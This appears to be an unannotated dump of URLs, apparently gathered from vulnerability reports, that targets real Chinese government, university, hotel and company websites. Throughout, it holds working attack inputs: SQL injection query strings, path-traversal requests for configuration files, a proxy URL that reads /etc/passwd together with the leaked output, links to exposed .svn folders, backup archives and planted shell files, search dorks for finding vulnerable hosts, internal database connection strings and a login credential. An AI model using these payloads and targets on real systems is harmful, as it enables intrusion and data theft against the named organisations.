http://eas.wyn88.com:6888/easweb/page/purOrder/branch/orderDetail.jsp?ponum=v01PO041120 http://topic.pptv.com http://cp.pptv.com jyfzzx.zjedu.org/admin/login.php http://www.evolution.ynu.edu.cn/web.rar http://www.evolution.ynu.edu.cn/gly_mag/index.aspx http://www.ieg.ynu.edu.cn/admin/ http://www.ieg.ynu.edu.cn/database/ http://www.ieg.ynu.edu.cn/db/ http://222.19.211.112/database/ http://www.ieg.ynu.edu.cn/edit/db/ http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15 http://fd.nenu.edu.cn/dede/index.php http://eblog.nenu.edu.cn http://office.nenu.edu.cn http://xxbs.nenu.edu.cn http://zcyjs.nenu.edu.cn http://fd.nenu.edu.cn http://efly.nenu.edu.cn http://office.nenu.edu.cn/ywbd/show.asp?id=381 http://sj.nenu.edu.cn/shenji/showgege.php?attid=41 http://chem.nenu.edu.cn/show_news.php?id=616&typeid=14 http://chinese.nenu.edu.cn/show_news.php?id=1053&typeid=15 http://subsite.nenu.edu.cn/qnn/questionresult.php?cs=8274 http://en.nenu.edu.cn/search.php http://www.phy.nenu.edu.cn/tu.php?class1=134 http://jjw.nenu.edu.cn/show.asp?id= http://postdoctor.nenu.edu.cn/sub/top.php?lk=jj&long=800 http://overseas.nenu.edu.cn/sub/top.php?lk=gplxzn&tag=26&long=500&PHPSESSID=vtvues5i8njkg0udcr99rafe81 http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/OutlayPayout_Select_particular.aspx?id=1 http://qzzby.cnta.gov.cn/privilege.php?act=login http://qzzby.cnta.gov.cn/visa.php?act=list http://218.78.241.80/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://jmzx.xmedu.cn:9999/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://www.gxbyzx.cn:88/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://oa.w12z.com/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://www.xwgjzx.com:8888/anmai/KY_Mamage/Integrate_Select/Patent_Production_particular.aspx?id=1 http://pinyin.sogou.com/dict/search/search_list/aa/normal http://pinyin.sogou.com/dict/search/search_list/aa/bb/normal http://training.hnteacher.net/ProjectPortal/index.aspx?id=149 http://home.hnteacher.net/Login.aspx http://demo2.74cms.com/ user:18600999295 pass:testlog http://www.inins.com/Policy/Insure/ConfirmPolicy/10000?type=Insure&group=0 http://www.inins.com/Policy/Insure/ConfirmPolicy/89736?type=Insure&group=0 http://allthingshair.youku.com/api/index.ph http://allthingshair.youku.com/api/index.ph http://ziyuan.eol.cn/list.php?listid=122 http://gnss.pku.edu.cn/www.rar http://gnss.pku.edu.cn/beif2011/admin.php http://123.232.106.72/.svn/entries http://www.caphbook.com/YH/BookList.aspx?con=000000070004 http://www.yz-news.com/jyycj/ http://www.yz-news.com/jyycj/admin/login.asp www.high-hope.com江苏汇鸿国际集团 http://221.226.187.26:1818/phpmyadmin http://221.226.187.26:1818/phpinfo.php泄漏了网站的绝对路径 http://218.78.241.80/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://jmzx.xmedu.cn:9999/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.gxbyzx.cn:88/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://oa.w12z.com/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.xwgjzx.com:8888/anmai\KY_Mamage\Plan_Task\Task_OutlayEarning_Right.aspx?depname=a http://www.hjsyy.com http://www.hjsyy.com/product.asp?BigClassName=%D2%BD%BC%BC%BF%C6%CA%D2 http://mail.deluxworld.com http://www.dgrb.cn/searchprocess.aspx http://www.szfcsc.com/web/PubInfo/MoreQY.asp?Qryqymc=%CB%E6%D6%DD%CA%D0%BD%F0%BF%C6%B7%BF%B5%D8%B2%FA%BF%AA%B7%A2%D3%D0%CF http://www.hsfdc.com/web/Pubinfo/MoreQY.asp?Qryqymc=%BB%C6%CA%AF%B0%C2%C9%BD%D6%C3%D2%B5%D3%D0%CF%DE%B9%AB%CB%BE http://www.xysfdc.com/web/PubInfo/MoreQY.asp?Qryqymc=%C2%C0%C1%BA%BD%F5%B6%AB%B7%BF%B5%D8%B2%FA%BF%AA%B7%A2%D3%D0%CF%DE http://www.wjfdc.gov.cn:81/web/PubInfo/MoreQY.asp?Qryqymc=%B0%B2%C7%EC%CA%D0%CF%C8%B7%E6%D7%A1%D5%AC%BF%AA%B7%A2%D3%D0%CF http://oa.sxpmg.com/defaultroot/login.jsp http://lib.zjtvu.edu.cn/ http://lib.zjtvu.edu.cn/Notice.asp?ID=161 http://223.223.203.249:8088/ http://jiaju.loupan.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2 http://www.js-lottery.com/ http://115.236.21.51:8090/loginAction.action http://**.**.**/yjrc/person/ResumAction.doformAction=in&objName=AWorkInfo&operType=update&id=****** http://blog.kdnet.net/boke.asp?id5815402.html http://www.wwlzwjw.com/admin_student_dy_qq.asp?page=1 http://www.hljrcpj.com/company/Login.aspx http://www.hljrcpj.com/company/dayin.aspx?jid=03970020020011 http://www.hljrcpj.com/SY_List.aspx?A_T_ID=001.04 http://www.cgrs.cn/content/cpzx/2011-03-25/366.htm) http://kehuduan.fanxing.com//commerce.php/commerceManage/login https://wiki.changba.com http://wwwdemo.wandafilm.com/ http://wwwdemo.wandafilm.com/wanda/findMyInnerMsg.do?m=findMsgList HTTP://xss.hacktask.net/*******1428052014 http://www.nlrkjsw.gov.cn/cs http://www.goldenhotel.com.cn http://ag.cnnice.com/ncqs/choosemateriallist.do http://zfb.wywk.cn/admin/index#shopList zfb.wywk.cn/admin/GetRechargeInfoByTransactionid?id=2014112700001000210040275344 http://58.216.140.92/waoscz/log.txt http://58.216.140.92/waoscz/sql.aspx?cz=1 http://222.186.93.101/ycapp/login.action http://www.zjna.gov.cn/ycapp/login.action http://en.zjna.gov.cn/ycapp/depAdmin/doLogin.action http://183.203.18.25/newtl/show/Message!gcMessage3G.action http://www.zjkh.bj.cn/stage.action demo:http://www.zjkh.bj.cn/demo.txt demo:http://58.210.170.254/1.jsp http://zjemis.gov.cn:8080/jsp/reportingType/templateDownload_download.action http://zjemis.gov.cn:8080/wooyun.jsp http://www.hntsw.gov.cn/select_result.jsp http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp http://work.zbintel.com/manager/setsql.asp http://shgl.zhengzhou.gov.cn/zcms/zcms/index.html http://shgl.zhengzhou.gov.cn/zcms/zcms/html/2014-02-23/814e69ad5968042633665316.html http://shgl.zhengzhou.gov.cn/zcms/wooyun.jsp http://iot.cwebport.com/1.jsp http://www.fjgkxx.gov.cn http://219.137.44.21:9000/psjc/swc/reported/main.action http://note.liba.com filetype:xls http://218.65.107.173/%28vjujwh45yqqckiueahvxjo45%29//ggsm.aspx?fbsj=2014-06-16%2016:18:55&yxqx=2014-09-23&xh=1 http://application.lishui.gov.cn/AppPlatForm/admin http://182.92.239.209/manage/index.php http://182.92.239.209/manage/upload/tupian/2015/1428484340_536273.php inurl:cpzs.asp?ProClass= http://www.njhpzkb.com/manage/modfypwd.asp http://tfyibiao.com/manage/modfypwd.asp http://www.jsdjtzfz.com/manage/modfypwd.asp http://njxiangyu.com/manage/modfypwd.asp http://www.njrhlqkj.com/manage/modfypwd.asp http://tieba.baidu.com/p/3674865898 http://mcrm.cpic.com.cn/crmweb/addpeople/html5/login.html http://mcrm.cpic.com.cn/crmweb/addpeople/html5/ http://mcrm.cpic.com.cn/crmweb/addpeople/html5/success-inquire.html?empno= http://www.henancatv.com http://223.223.176.56:8080/background/Main/login.action demo:http://223.223.176.56:8080/1.jsp http://*******/Udw3Gi index.php/admin/main/login http://hd.liba.com http://test1.www.51zfx.net/newadmin/Distributor/Login.aspx http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=2015-04-08'+and+1=@@version--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2= http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=db_name%28%29--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22 http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=user--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22 http://pl.zhibo8.cc/config.inc.php.bak zpjiaoyi.com/bbs/uc_server& inurl:list.aspx?columntag= http://www.jzxdzjc.gov.cn/portal/dzjc/jsjy/list.aspx?columnTag=%27zcfg%27 http://119.178.103.6:81/portal/dzjc/jsjy/list.aspx?columnTag='tzgg http://221.193.244.207:82/portal/dzjc/jsjy/list.aspx?columnTag=%27zcfg%27 http://121.18.36.138:90/anxin/website/list.aspx?columntag=tscy http://211.142.37.152:90/portal/dzjc/jsjy/list.aspx?columnTag='dzjc_jxtb http://mpay.hexun.com/RemitInfo.aspx?V_addinfo_product_name=%B8%F6%C8%CB%D5%CB%BB%A7%B3%E4%D6%B5&Order_sn=20150316000108 http://www.verymall.cn/member.php?action=order rdp://58.68.236.167:3389 http://tv.weipai.cn/phpinfo.php http://mobile.weipai.cn/?src=http%3A%2F%2Fwww.baidu.com%2F%3F1428487795.81&host=www.weipai.cn http://www.hrbcdc.com/admin/ http://api.m.renren.com/api http://www.m6go.com/my/myAddressList.do http://www.dzqh.com.cn/about_us.do http://baike.baidu.com/link?url=dQRxI2MgHaFQIgmsaKi8qdtxjBlF83dPcr7JsJjR71sFWto2kgAB8WwbILGprNSMumxJg0El5UpzEouTYrmYLq http://api.m.renren.com/api http://www.xiangshe.com/my/Address.do http://enterprise.zte.com.cn/jbossws13/ http://218.78.241.80/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://jmzx.xmedu.cn:9999/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.gxbyzx.cn:88/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://oa.w12z.com/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.xwgjzx.com:8888/anmai/RecruitstuManage/hiddenValue.aspx?topicid=1 http://www.bicesoft.com/ProductCase.html http://show.bicesoft.com/Apps/vote/Login.aspx http://diaocha.gd315.gov.cn/ http://vote.zbjw.gov.cn/ http://tousu.zbjw.gov.cn/ http://test1.xxls.gov.cn/ http://116.236.237.146/ http://fqxx.szftedu.cn:83/vote/default.htm http://dc.bjpop.gov.cn/vote/default.htm http://vote.cnhan.com/ http://vote.fdxjy.com/ http://survey.bjcsf.com/ http://www.gzszjgdj.gov.cn:8080/ http://show.bicesoft.com/Apps/vote/ http://vote.cnhan.com/login.aspx http://wooyun.org/bugs/wooyun-2010-0101477 www.tudou.com/programs/view/wmQHmEEyM4E/ http://58lohas.com.cn/Admin/Login/index.html http://yjmw.cn http://218.78.241.80/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://jmzx.xmedu.cn:9999/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://www.gxbyzx.cn:88/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://oa.w12z.com/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 http://www.xwgjzx.com:8888/anmai/refresher/Ajax/DelFuJian.aspx?sta=topic&topicid=1 inurl:web/index.php site:gov.cn http://www.fyjc.gov.cn/web/index.php?module=information08&act=list&category_id=259 http://www.xybb.gov.cn/web/index.php?module=documents02&category_id=116 http://www.xydpc.gov.cn/web/index.php?module=vote&act=list&category_id=82 http://www.xyit.gov.cn/web/index.php?module=information09&act=list&category_id=136 http://www.fyjc.gov.cn/web/index.php?module=information08&act=list&category_id=259 http://www.xygl.org/web/index.php?module=download&category_id=78 http://old.xyaic.gov.cn/web/index.php?module=information01&category_id=60 http://www.xyga.gov.cn/web/index.php?module=information05&act=list&category_id=61 http://xnh.xybb.gov.cn/web/index.php?module=information03&category_id=46 http://www.xyipo.gov.cn/web/index.php?module=information05&act=list&category_id=153 http://www.xybb.gov.cn/web/index.php?module=information20&act=list&category_id=215 http://www.xycg.gov.cn/web/index.php?module=information01&category_id=123 http://www.xyfazhi.gov.cn/web/index.php/module-information-category_id-213.htm http://www.jxxyfda.gov.cn/web/index.php?module=information14&act=list&category_id=155 http://www.xysports.gov.cn/web/index.php?module=policy&category_id=10 http://www.xycg.gov.cn/web/index.php?module=information02&category_id=137 http://www.xygzw.gov.cn/web/index.php?module=documents&act=list&category_id=61 http://www.xyxfj.gov.cn/web/index.php?module=information01&category_id=106 http://www.xywqb.gov.cn/web/index.php?module=information01&category_id=202 http://www.yoloho.com/done http://wap.zhuqu.com/people/375223/folder http://116.213.178.81/data/config.php_bak http://brandbase.mama.cn/friso.php?cityid=1&forumid=127&mod=activity https://accounts.grandcloud.cn http://www.huway.com/user_jyxq?from=actorder&orderid=%s http://hbcdc.cn/index.php/common-vote.html?id=1 http://www.chinalife.com.cn/jobs/module/outresumePrint/outprintPreview.do?applylogininfoIds=10000&selectedProjectId=&applyType=1 http://www.chinalife.com.cn/jobs/module/outresumePrint/outprintPreview.do?applylogininfoIds=278011&selectedProjectId=&applyType=1 http://rszp.gdufs.edu.cn/zpsys/apps/jsp/getXmlFromdata.jsp inurl:/Web_Site/tsjy.aspx?lmid= http://www.xgfdc.com.cn/Web_Site/tsjy.aspx?lmid=201 http://www.thfdc.gov.cn/Web_Site/tsjy.aspx?lmid=201 http://www.yxfgs.net/Web_Site/tsjy.aspx?lmid=201 http://www.hsxfdc.com/Web_Site/tsjy.aspx?lmid=201 http://www.ljfc.gov.cn/Web_Site/tsjy.aspx?lmid=201 http://www.hr.gdtel.com.cn/resumeAction_exportResume.html?regId=3000001 http://www.hr.gdtel.com.cn/resumeAction_exportResume.html?regId=3064929 url:http://211.95.193.95/orderAccept/manager/admin_index.jsp http://youwu.jiemian.com/Admin http://www.hntsw.gov.cn/select_result.jsp http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp http://i.yixin.com/ http://i.yixin.com/,来到重置密码的地方,输入邮箱账号,点击下一步 http://i.byd.com.cn/config/config.rar URL:http://i.byd.com.cn/config/testdatacenter.rar http://www.966599.com/ http://edu.966599.com/lds/sys_toLogin.do http://www.hntsw.gov.cn/select_result.jsp http://www.fjase.com/index.jsp http://58.213.147.216/ http://www.hljts.gov.cn/index.jsp http://111.75.211.4/index.jsp http://122.227.22.214:90/index.jsp yw.zjedu.org/common/key_xxgl.php http://jifen.fumu.com/flow.php?step=update_cart http://*****8 http://xf.gdwst.gov.cn/letter/writeletter.jsp?xlbox=5 http://localhost/cgi-bin/test-cgi http://beian.ncfdj.gov.cn:8080/buildInfo.aspx?certno=20150093 http://222.135.76.130/buildInfo.aspx?certno=SD10117 http://www.jlxfdc.com:8308/buildInfo.aspx?certno=20130004 http://www.jxanyifg.com/webbargain/buildInfo.aspx?certno=2013-011 http://58.59.112.106/buildInfo.aspx?certno=%E6%83%A0%E6%88%BF%E9%A2%84%E5%AD%97%E7%AC%AC2010-04%E5%8F%B7 http://www.ychfgj.com/ba/buildInfo.aspx?certno=201211 http://www.bxfgj.gov.cn/webbargainbx/buildInfo.aspx?certno=20080053 http://www.lysfgj.com:81/buildInfo.aspx?certno=201013 http://www.bzfcj.gov.cn:9090/buildInfo.aspx?certno=201207007 http://121.26.200.28:8080/buildInfo.aspx?certno=2014043 http://www.jxanyifg.com/webbargain/buildInfo.aspx?certno=2013-011 http://202.206.64.221:8080/gmis/login.aspx http://login.360.cn/intf.php?method=UserIntf.login&des=1&is_keep_alive=0&from=360cloud_mobile&fields=qid&v=1.2.2¶m={0}&format=json&sig={1 www.iyunmai.com然后马上得到了域名信息 http://www.nbsz.gov.cn http://wwwdemo.wandafilm.com http://wooyun.org/bugs/wooyun-2015-0106596)这个案例提过该测试主站的数据是同步的,故问题归结于测试站点和生产站点未做隔离导致相应的漏洞升级。 http://wwwdemo.wandafilm.com/trade/coupons.do?m=useExachangeStage&sid=0.14484114106744528 http://wwwdemo.wandafilm.com http://www.cqczkj.gov.cn:8081/jobfan/2010.jsp jdbc:oracle:thin:@172.23.121.2:1521:ufgov http://www.teda.gov.cn/tedaweb/default.aspx http://bm.ahkj.gov.cn:8080/ahkj/common/eWebEditor/admin/default.jsp http://bm.ahkj.gov.cn:8080/ahkj/common/eWebEditor/uploadfile/2010.jsp jdbc:oracle:thin:@10.20.150.97:1521:faimapp http://219.232.200.39/uamsso/。选择口令方式登陆 http://psy.ruc.edu.cn/newsinfo.php?id=-3322 http://psy.ruc.edu.cn/activityinfo.php?id=8 http://psy.ruc.edu.cn/faculty.php?sortid=3 http://psy.ruc.edu.cn/newsinfo.php?id=34 http://www.zhuanligo.cn/sort_list.php?sort_id=6 http://m.damai.cn/login.aspx?from=userinfo.aspx http://113.31.22.137:20202/admin.php http://113.31.22.137:20200/root/ http://www.itrust.org.cn/ URL:http://www.chinaamc.com/portal/cn/second_login.jsp?categoty_link=../../WEB-INF/web.xml%3f&column=1246275754100&link_page=http://www.chinaamc.com/portal/cn/second.jsp&minisite_column=1208583703100 www.110122.cn/portal/HomePage!newsDetail.doID=151596_ http://www.110122.cn/***** http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf www.pomelo.com/ www.52hxw.com/ www.posterlabs.cn/ http://auth.seeyouyima.com/.svn/entries http://www.seeyouyima.com//.svn/entries http://www.seeyouyima.com/update_admin/login.php www.baozouwushuang.com http://www.flcit.com/index.do POST:/dms/pwdup!chkFolderPwd.do Data:pickbtn=%E6%8F%90%E4%BA%A4%E9%AA%8C%E8%AF%81&supply=aa&uploadPwd=a http://www.tayz.cn/dms/pwdup!chkFolderPwd.do http://www.xmkjzx.com/dms/pwdup!chkFolderPwd.do http://www.xmblxx.com/dms/pwdup!chkFolderPwd.do http://jydd.xmhcedu.gov.cn/dms/pwdup!chkFolderPwd.do http://www.xmxayz.com/dms/pwdup!chkFolderPwd.do http://220.180.89.90:8081/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://dydl.sddylib.com/userlogin.aspx http://ggg.360elib.com/userlogin.aspx http://221.1.218.166:81/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://218.23.126.222:999/userlogin.aspx http://60.170.103.21:81/userlogin.aspx http://zslib.org:8000/userlogin.aspx http://211.141.185.166:82/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://book.gyxtsg.org/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx http://www.zixilib.com:8008/userlogin.aspx http://co.dichuang.cc:85/userlogin.aspx http://220.180.89.90:8081/userlogin.aspx http://www.tlzxx.net/tushu/userlogin.aspx http://www.tsqtsg.cn:88/userlogin.aspx http://120.194.7.10:8087/userlogin.aspx www.gsgajt.gov.cn/)_ gsgajt.gov.cn/WEBCGS/Search.aspxTitle=1111_ http://gs***** http://218.245.4.39/front/login!logout.do http://chanye.focus.cn/chanye_rentsale/user_center.php?operation_type=2&page=1&rentsale=-1 http://wooyun.org/bugs/wooyun-2013-046868 http://helpdesk.sunits.com/hd/login!findPass.do http://helpdesk.sunits.com/hd/1.txt http://www.wom186.com http://fwwbqy.fwmys.mofcom.gov.cn/ http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00&sp=S http://fwwbqy.fwmys.mofcom.gov.cn/pages/information/NwbZoneInfoPopList_$DirectLink_2.html?session=T&sp=S00'&sp=S ext:/usr/java/packages/lib/ext http://union.fhyx.com/index.php http://wap.caitiyu.com/pages/weixin/hmdt/.svn/entries http://wap.caitiyu.com/pages/weixin/help/.svn/entries http://wap.caitiyu.com/pages/weixin/jingcai/.svn/entries http://wap.caitiyu.com/pages/weixin/.svn/entries http://wap.caitiyu.com/pages/weixin/JcSingle/.svn/entries http://bug.caitiyu.com/?mode=phpinfo http://218.78.241.80/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://oa.w12z.com/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://www.xwgjzx.com:8888/anmai/SF_Manage/lookbookpreeshow.aspx?year1=1 http://202.118.31.223:801/sbweb/Userlogin.asp?uid=%E6%B5%91%E5%8D%97%E6%A0%A1%E5%8C%BA%E7%AE%A1%E7%90%86%E5%A7%94%E5%91%98%E4%BC%9A&pwd=123 http://218.78.241.80/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://oa.w12z.com/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://www.xwgjzx.com:8888/anmai/SF_Manage/tfdeleN.aspx?tfid=1 http://**.**.**/ http://**.**.**/www.rar http://218.29.219.68/area/customer.asp,页面有个搜索: http://da.linyi.gov.cn/view.asp?id=324 http://da.linyi.gov.cn/newadmin/login.asp http://www.xxs.la/TWWsZt http://www.gyqx.gov.cn/manage.asp http://mail.126.com/js6/h/flashRequest.swf http://www.mingjian.com/moban_show.php?c http://113.132.128.83/.svn/entries http://113.132.128.83:8080/.svn/entries http://113.132.128.83:9001/.svn/entries http://113.132.128.83:8008/.svn/entries http://113.132.128.83:8007/.svn/entries http://113.132.128.83:9006/.svn/entries http://m.myctu.cn/.svn/entries http://www.redocn.com/company.php?uid=3175546&do=case&op=viewalbum&albumid=290174 http://218.78.241.80/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://jmzx.xmedu.cn:9999/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://www.gxbyzx.cn:88/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://oa.w12z.com/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://www.xwgjzx.com:8888/anmai/SF_Manage/tfallremove.aspx?tfid=1 http://www.easelandhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 aihotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 baohonghotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 baolilai-hotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 bmgcn.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 chinameetings.cn/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dehan.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 devpaytmpl3v15.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dgdh.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dggarden.royalhotels.cn/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dgrhm.group.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dzhgz.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 easelandhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 electron.physics.buffalo.edu/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 fhschotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 guangzhougdhhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://118.186.218.66/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml http://118.186.218.217/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml http://www.bhyuanqutong.com http://116.211.4.186/config/config_global.php.bak http://www.ggg.cn/ http://www2.zuche.com/console/ www.myctu.cn http://circle.myctu.cn/api.php?app=userauth:api&mod=plugin¶m=uid%3D0&random=0.5043484827037901&_=1428579086625 http://www.bllib.net.cn:8080/vod/vod_List.html?CategoryID=2&type=M http://www.msit21.com/vod/vod_List.html?CategoryID=2&type=M 